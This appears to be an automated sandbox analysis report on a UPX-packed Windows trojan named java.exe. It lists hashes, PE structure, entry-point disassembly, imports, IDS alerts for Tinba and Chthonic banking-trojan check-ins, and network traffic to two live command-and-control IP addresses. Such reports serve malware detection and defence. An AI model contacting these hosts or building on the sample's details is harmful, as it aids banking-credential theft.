                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"
                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114941
                                                                                                                                                                        Entropy (8bit):5.179500563537803
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"
                                                                                                                                                                        Process:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):116224
                                                                                                                                                                        Entropy (8bit):5.299499746289874
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:AiLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:AiyvRmDLs/ZrwWjjAqGcfzWH
                                                                                                                                                                        MD5:CB95EC2B6EF058D45AA18CD146471002
                                                                                                                                                                        SHA1:0CB8175F51065046CD77E97C0E494AF09D4590F5
                                                                                                                                                                        SHA-256:05B0CFAE079AD7795B4FAACC8687078E4F42470F942E305559BB3DA027CBAD47
                                                                                                                                                                        SHA-512:3568358E90C56F13EC150BB0C08F0E2705721D21588AD78D1C38BCA4966009F4B873FE52D6FB001C788245AF0D1C365EDAE69F6DBEC3A326B92A511F0E6715CB
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L...(..T.............................Z............@.....................................................................................X...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@....imports............................@...........................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Entropy (8bit): 5.299512539602008
TrID:
• Win32 Executable (generic) a (10002005/4) 99.66%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: java.exe
File size: 116'224 bytes
MD5: 0411c0706f66b49aa6bef1528606ee31
SHA1: bdb8cb7a8aa380138ab9220075bb08b03a5edc28
SHA256: 9e6e9d8eabba4b886fa84170137e3a72c35cc7b360a5cba1a08cbc6b6f468a3c
SHA512: 3602a6a6503c363a1ff0185e3a8e5de51bfb58ebaf72903c141b68ea8d284553a2cd470439aab3af90a5bafec423845b37742a473055f12f0df2c8a0a4c1b53b
SSDEEP: 1536:jiLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:jiyvRmDLs/ZrwWjjAqGcfzWH
TLSH: 64B34B62F204E89BE817D8F29919CD3164A37DBC88A0455E32D97F6D58B3AD30859F0F
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L......T...........................
Icon Hash: 888c8e8eaa868fc6
Entrypoint: 0x405a80
Entrypoint Section: UPX0
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x549217DD [Wed Dec 17 23:55:09 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: d39aa71a62356d5bd05b3ccf2dfedd9e

Instruction
push ebp
mov ebp, esp
push ebx
push esi
sub esp, 38h
mov dword ptr [ebp-10h], 00000000h
mov eax, dword ptr [ebp-10h]
mov dword ptr [ebp-2Ch], 00000001h
mov ecx, dword ptr [ebp-2Ch]
mov dword ptr [ebp-20h], 00000000h
mov word ptr [ebp-22h], 2D5Bh
mov edx, dword ptr [ebp-20h]
mov dword ptr [ebp-28h], 00000007h
mov esi, dword ptr [ebp-28h]
mov byte ptr [ebp-2Dh], 00000052h
mov bl, byte ptr [ebp-2Dh]
mov word ptr [ebp-30h], 796Dh
mov byte ptr [ebp-09h], bl
mov eax, dword ptr [ebp+00h]
mov dword ptr [0040DD44h], eax
lea eax, dword ptr [ebp+04h]
mov dword ptr [0040DD48h], eax
mov dword ptr [esp], esi
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-38h], ecx
mov dword ptr [ebp-3Ch], edx
call 00007F6768E9602Eh
mov ecx, dword ptr [ebp-3Ch]
cmp eax, ecx
je 00007F6768E9646Eh
mov ax, 0000h
mov cx, word ptr [ebp-30h]
mov dx, ax
sub dx, word ptr [ebp-30h]
mov word ptr [ebp-30h], dx
sub ax, word ptr [ebp-30h]
or cx, 1256h
mov word ptr [ebp-30h], cx
mov word ptr [ebp-22h], ax
mov esi, dword ptr [ebp-38h]
mov dword ptr [ebp-14h], esi
jmp 00007F6768E96454h
mov ax, 0000h
mov ecx, dword ptr [ebp-34h]
mov dword ptr [ebp-14h], ecx
sub ax, word ptr [ebp-22h]
mov word ptr [ebp-22h], ax
mov eax, dword ptr [ebp-14h]
mov cx, word ptr [ebp-22h]
and cx, 0673h
mov word ptr [ebp-22h], cx
add esp, 38h
pop esi
pop ebx
pop ebp
ret
add byte ptr [eax], al

Programming Language:
• [ASM] VS2005 build 50727
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [C++] VS2005 build 50727
• [RES] VS2005 build 50727
• [LNK] VS2005 build 50727

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d000 | 0x8c | .imports
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c000 | 0xd58 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x10000 | 0xf600 | False | 0.4557768038617886 | DOS executable (COM) | 4.895667733918766 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x11000 | 0xb000 | 0xb000 | False | 0.3611505681818182 | data | 5.633049275866229 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1c000 | 0x1000 | 0x1000 | False | 0.318359375 | data | 3.483060593097884 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.imports | 0x1d000 | 0x1000 | 0xc00 | False | 0.421875 | data | 4.436376811230836 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1c2fc | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.21890243902439024
RT_ICON | 0x118a0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.3400537634408602
RT_ICON | 0x11b98 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | | | 0.35450819672131145
RT_ICON | 0x11d90 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.46283783783783783
RT_ICON | 0x11ec8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5026652452025586
RT_ICON | 0x12d80 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.5798736462093863
RT_ICON | 0x13638 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.40264976958525345
RT_ICON | 0x13d10 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.3273121387283237
RT_ICON | 0x14288 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.27344398340248965
RT_ICON | 0x16840 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.37875234521575984
RT_ICON | 0x178f8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.37868852459016394
RT_ICON | 0x18290 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.4796099290780142
RT_GROUP_ICON | 0x1c968 | 0xae | data | | | 0.5919540229885057
RT_VERSION | 0x1ca1c | 0x33c | data | | | 0.47342995169082125

DLL | Import
GDI32.dll | GetDeviceCaps
KERNEL32.DLL | AddAtomW, FreeConsole, GetCurrencyFormatW, IsProcessorFeaturePresent, CreateEventA, OpenFileMappingW, LocalHandle, HeapSize, MulDiv, WriteFile, GetTempFileNameW, SetLocaleInfoW, DosDateTimeToFileTime, EnumLanguageGroupLocalesW, CreatePipe, GetPrivateProfileSectionNamesA, SetConsoleTitleA, CancelDeviceWakeupRequest, GetVolumePathNameA, GetProfileIntA, GetDateFormatA, DebugBreak, SuspendThread, SetCommMask, EnumUILanguagesW, MoveFileWithProgressA, BackupRead, GetNumberOfConsoleInputEvents, GetLongPathNameA, FreeLibrary, GetFileAttributesW, EnumDateFormatsA, QueryDosDeviceA, UpdateResourceW, WritePrivateProfileStructA, lstrcpynA, GetExitCodeProcess, GlobalAddAtomW, GetShortPathNameW, UnlockFileEx, SetComputerNameExA, GetExitCodeProcess
WINMM.dll | timeSetEvent, waveOutOpen, midiConnect, midiOutSetVolume, mmioOpenA, mmioWrite, DrvGetModuleHandle, mciGetDeviceIDFromElementIDW, waveOutGetErrorTextW, joyGetPosEx, mixerSetControlDetails, joySetThreshold, mmioRead, waveOutGetDevCapsA, DefDriverProc, mmioDescend, mixerGetLineInfoA, mciSendStringA, midiOutClose, midiInGetDevCapsW, midiStreamOut, mmioSetBuffer, midiInClose, waveOutReset, midiOutPrepareHeader, waveInGetPosition, GetDriverModuleHandle, mmioGetInfo, midiInMessage, mciGetCreatorTask, auxGetVolume, joyGetDevCapsW, waveInGetErrorTextA, mixerGetLineControlsW
mscms.dll | GetColorProfileElement, UninstallColorProfileA, AssociateColorProfileWithDeviceA, EnumColorProfilesW, GetStandardColorSpaceProfileW, DisassociateColorProfileFromDeviceW, GetStandardColorSpaceProfileA, SetStandardColorSpaceProfileW, DeleteColorTransform, GetPS2ColorRenderingIntent, SetColorProfileHeader, TranslateBitmapBits, CreateColorTransformA, ConvertIndexToColorName, CreateProfileFromLogColorSpaceW, RegisterCMMW, GetColorProfileElementTag, GetColorProfileFromHandle, UninstallColorProfileW, CreateMultiProfileTransform, GetCountColorProfileElements, InstallColorProfileA, CreateColorTransformW, CheckColors, SetColorProfileElementReference
msvcrt.dll | iswprint, _wgetenv, srand, strtok, iswupper, tolower, fputs, _swab, wcsncpy, _fputchar, iswctype, _strupr, bsearch, _strnicmp, memcmp, _wspawnl, _abnormal_termination, _rotl, _flsbuf, isdigit, memmove, _isctype, isalpha, isgraph, _wspawnvpe, _wexecve, _wcslwr, _wcsrev, fputwc, _fcvt, _ultoa, tmpnam, _wcreat
ole32.dll | OleCreateFromData, HWND_UserMarshal, CreateAntiMoniker, CoInitialize, CoSetProxyBlanket, CoDisconnectObject, ReleaseStgMedium, HGLOBAL_UserSize, PropStgNameToFmtId

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/19/23-00:41:44.628603 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49736 | 80 | 192.168.2.4 | 104.131.68.180
12/19/23-00:41:46.120627 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49737 | 80 | 192.168.2.4 | 216.218.185.162
12/19/23-00:41:44.628603 | TCP | 2830613 | ETPRO TROJAN W32/Chthonic CnC Activity | 49736 | 80 | 192.168.2.4 | 104.131.68.180
12/19/23-00:41:47.666890 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49738 | 80 | 192.168.2.4 | 216.218.185.162
12/19/23-00:41:44.628603 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49736 | 80 | 192.168.2.4 | 104.131.68.180
12/19/23-00:41:47.666890 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49738 | 80 | 192.168.2.4 | 216.218.185.162
12/19/23-00:41:33.880543 | TCP | 2020418 | ET TROJAN Tinba Checkin 2 | 49735 | 80 | 192.168.2.4 | 216.218.185.162
12/19/23-00:41:33.880543 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49735 | 80 | 192.168.2.4 | 216.218.185.162
12/19/23-00:41:46.120627 | TCP | 2024659 | ET TROJAN [PTsecurity] Tinba Checkin 4 | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2023 00:41:01.324368000 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:23.189815044 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:23.191852093 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:23.191880941 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:23.192210913 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:23.202622890 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:23.202636003 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:23.496133089 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:23.589811087 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:23.589926004 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:24.105520964 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.057265043 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.057287931 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:25.057631016 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:25.057678938 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.058381081 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.058413982 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:25.076422930 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.076436043 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:25.308671951 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.474803925 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:25.475245953 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:25.475312948 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.475419998 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.475438118 CET | 443 | 49730 | 173.222.162.32 | 192.168.2.4
Dec 19, 2023 00:41:25.475449085 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:25.475481033 CET | 49730 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:27.714906931 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:32.527401924 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:33.342890024 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:33.544368982 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:33.544491053 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:33.880542994 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:34.081960917 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:34.082025051 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:34.283010960 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:34.283396959 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:34.283459902 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:34.283638000 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:38.616506100 CET | 49735 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:38.817711115 CET | 80 | 49735 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:42.136801958 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2023 00:41:44.458991051 CET | 49736 | 80 | 192.168.2.4 | 104.131.68.180
Dec 19, 2023 00:41:44.626821041 CET | 80 | 49736 | 104.131.68.180 | 192.168.2.4
Dec 19, 2023 00:41:44.626909971 CET | 49736 | 80 | 192.168.2.4 | 104.131.68.180
Dec 19, 2023 00:41:44.628602982 CET | 49736 | 80 | 192.168.2.4 | 104.131.68.180
Dec 19, 2023 00:41:44.795018911 CET | 80 | 49736 | 104.131.68.180 | 192.168.2.4
Dec 19, 2023 00:41:44.795100927 CET | 49736 | 80 | 192.168.2.4 | 104.131.68.180
Dec 19, 2023 00:41:44.961527109 CET | 80 | 49736 | 104.131.68.180 | 192.168.2.4
Dec 19, 2023 00:41:44.968421936 CET | 80 | 49736 | 104.131.68.180 | 192.168.2.4
Dec 19, 2023 00:41:44.968435049 CET | 80 | 49736 | 104.131.68.180 | 192.168.2.4
Dec 19, 2023 00:41:44.968966961 CET | 49736 | 80 | 192.168.2.4 | 104.131.68.180
Dec 19, 2023 00:41:44.968966961 CET | 49736 | 80 | 192.168.2.4 | 104.131.68.180
Dec 19, 2023 00:41:45.135353088 CET | 80 | 49736 | 104.131.68.180 | 192.168.2.4
Dec 19, 2023 00:41:45.918627024 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:46.120387077 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:46.120497942 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:46.120626926 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:46.322284937 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:46.322359085 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:46.523906946 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:46.524444103 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:46.524456024 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:46.524658918 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:46.524930954 CET | 49737 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:46.726591110 CET | 80 | 49737 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:47.465358973 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:47.666697979 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:47.666779041 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:47.666889906 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:47.867882967 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:47.867964983 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:48.069252014 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:48.071468115 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:48.071528912 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:48.071772099 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:53.135473013 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:53.183711052 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:41:59.167958021 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:41:59.214984894 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:05.148691893 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:05.199353933 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:11.177659988 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:11.230655909 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:17.132055044 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:17.183778048 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:23.131304979 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:23.183748960 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:29.123557091 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:29.168138027 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:35.163013935 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:35.215015888 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:41.203771114 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:41.246270895 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:47.200882912 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:47.246324062 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:53.165776014 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:53.215081930 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:42:59.133546114 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:42:59.183963060 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:43:05.150171041 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:43:05.199718952 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:43:11.185828924 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:43:11.230670929 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:43:17.137090921 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:43:17.183808088 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:43:23.129139900 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:43:23.183823109 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Dec 19, 2023 00:43:29.205451012 CET | 80 | 49738 | 216.218.185.162 | 192.168.2.4
Dec 19, 2023 00:43:29.246298075 CET | 49738 | 80 | 192.168.2.4 | 216.218.185.162
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2023 00:41:10.802402020 CET | 62709 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2023 00:41:11.373840094 CET | 53 | 62709 | 1.1.1.1 | 192.168.2.4
Dec 19, 2023 00:41:38.617091894 CET | 61278 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2023 00:41:39.146748066 CET | 53 | 61278 | 1.1.1.1 | 192.168.2.4
Dec 19, 2023 00:41:44.969724894 CET | 54874 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2023 00:41:45.555104971 CET | 53 | 54874 | 1.1.1.1 | 192.168.2.4
